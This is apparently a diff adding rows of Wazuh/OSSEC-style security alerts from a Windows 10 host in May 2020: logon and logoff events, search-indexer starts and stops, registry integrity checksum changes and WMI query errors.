+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:16:48.504",3,"The Windows Search Service started","""The Windows Search Service started. +""", +"May 22, 2020 @ 15:16:48.410",3,"The database engine attached a database","""SearchIndexer (716,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:003B:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000203 +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.004531 -0.001122 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:128K # 0K, PF:152K # 0K, P:152K) +[4] 0.000091 +J(0) +[5] - +[6] - +[7] - +[8] 0.001911 -0.000749 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:204K # 0K, PF:640K # 0K, P:640K) +[9] 0.011706 -0.000284 (5) CM -0.011199 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 120K, P:256K) +[10] 0.000229 -0.000140 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:12, WS:44K # 0K, PF:100K # 100K, P:100K) +[11] 0.000011 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000031 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000003 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""", +"May 22, 2020 @ 15:16:48.301",3,"The database engine is starting a new instance","""SearchIndexer (716,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""", +"May 22, 2020 @ 15:16:47.708",3,"The Windows Search Service stopped normally","""Windows Search Service stopped normally. 
+""", +"May 22, 2020 @ 15:16:47.692",5,"The database engine stopped an instance","""SearchIndexer (4592,T,97) Windows: The database engine stopped the instance (0). + +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000008 +J(0) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[2] 0.000021 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.000739 -0.000529 (1) CM +J(CM:1, PgRf:10, Rd:0/0, Dy:0/10, Lg:284/13) +M(C:0K, Fs:45, WS:180K # 0K, PF:8K # 0K, P:8K) +[4] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[5] 0.051269 -0.000006 (22) CM -0.036427 (7) WT +J(CM:22, PgRf:0, Rd:0/22, Dy:0/0, Lg:0/0) +M(C:0K, Fs:185, WS:304K # 0K, PF:8K # 0K, P:8K) +[6] 0.001413 +J(0) +M(C:0K, Fs:1, WS:-1216K # 0K, PF:-3016K # 0K, P:-3016K) +[7] 0.000018 +J(0) +[8] 0.010167 -0.007266 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3664/2) +M(C:0K, Fs:29, WS:16K # 0K, PF:84K # 0K, P:84K) +[9] 0.000427 -0.000384 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[10] 0.000004 +J(0) +[11] 0.001435 -0.000592 (2) WT +J(0) +[12] 0.000051 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000204 +J(0) +[14] 0.000056 +J(0) +M(C:0K, Fs:0, WS:-68K # 0K, PF:-72K # 0K, P:-72K) +[15] 0.000009 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K).""", +"May 22, 2020 @ 15:15:09.550",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T15:12:08Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:14:46.191",3,"Windows Logon Success","""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:14:41.113",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:14:25.082",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'b187c4a14d4a0fc8b255a5e6dc68e1b1' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'd35485293b6324039fb84a913c4ac605c9050f4a' +" +"May 22, 2020 @ 15:14:25.065",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '737129e2f8cfe11a96ca093d49dee7f2' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '559d4974169b9c45d6f345deb22f6aeee8abefa8' +" +"May 22, 2020 @ 15:13:35.439",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T15:12:32Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:13:23.826",3,"Windows User Logoff","""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB464E + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.""", +"May 22, 2020 @ 15:13:23.784",3,"Windows User Logoff","""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB466D + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""", +"May 22, 2020 @ 15:13:23.736",3,"Windows Workstation Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB466D + Linked Logon ID: 0xB464E + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x110 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:13:23.706",3,"Windows Workstation Logon Success","""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB464E + Linked Logon ID: 0xB466D + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x110 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:13:05.829",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:13:04.033",5,"License Activation (slui.exe) failed","""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""", +"May 22, 2020 @ 15:12:54.806",3,"The Windows Search Service started","""The Windows Search Service started. +""", +"May 22, 2020 @ 15:12:54.776",3,"The database engine attached a database","""SearchIndexer (4592,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). 
(Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:0009:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000025 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.005410 -0.005191 (1) WT +J(0) +M(C:0K, Fs:47, WS:124K # 0K, PF:96K # 0K, P:96K) +[3] 0.013639 -0.006595 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:41, WS:128K # 0K, PF:140K # 0K, P:140K) +[4] 0.000084 +J(0) +[5] - +[6] - +[7] - +[8] 0.002228 -0.000741 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:204K # 0K, PF:644K # 0K, P:644K) +[9] 0.042161 -0.000127 (5) CM -0.041833 (3) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 44K, PF:256K # 168K, P:256K) +[10] 0.000301 -0.000204 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 44K, PF:96K # 96K, P:96K) +[11] 0.000015 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000035 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""", +"May 22, 2020 @ 15:12:54.647",3,"Windows Logon Success","""An account was successfully logged on. 
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x248
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:12:54.606",3,"The database engine is starting a new instance","""SearchIndexer (4592,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""",
+"May 22, 2020 @ 15:12:49.719",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\NETWORK SERVICE; ClientProcessId = 3088; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Product FROM Win32_BaseBoard; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:12:48.614",5,"SessionEnv was unavailable to handle a notification event","""The winlogon notification subscriber was unavailable to handle a notification event.""",
+"May 22, 2020 @ 15:12:45.443",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x248
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:12:43.568",3,"Ossec agent started.",,"ossec: Agent started: 'windows-10->any'."
+"May 22, 2020 @ 15:11:26.071",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T13:17:09Z. Reason: RulesEngine.""",
+"May 22, 2020 @ 15:11:13.361",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:11:13.257",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:10:32.204",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed.
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d'
+New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f'
+Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2'
+New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792'
+"
+"May 22, 2020 @ 15:10:25.736",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT RequiredSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:10:25.720",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT SecurityServicesConfigured FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:10:25.705",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT RequiredSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:10:25.689",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT SecurityServicesRunning FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:10:23.018",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\CIMV2 : SELECT SMBIOSAssetTag FROM Win32_SystemEnclosure ; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:10:23.001",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ID FROM Win32_ServerFeature; ResultCode = 0x80041010; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:10:20.471",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
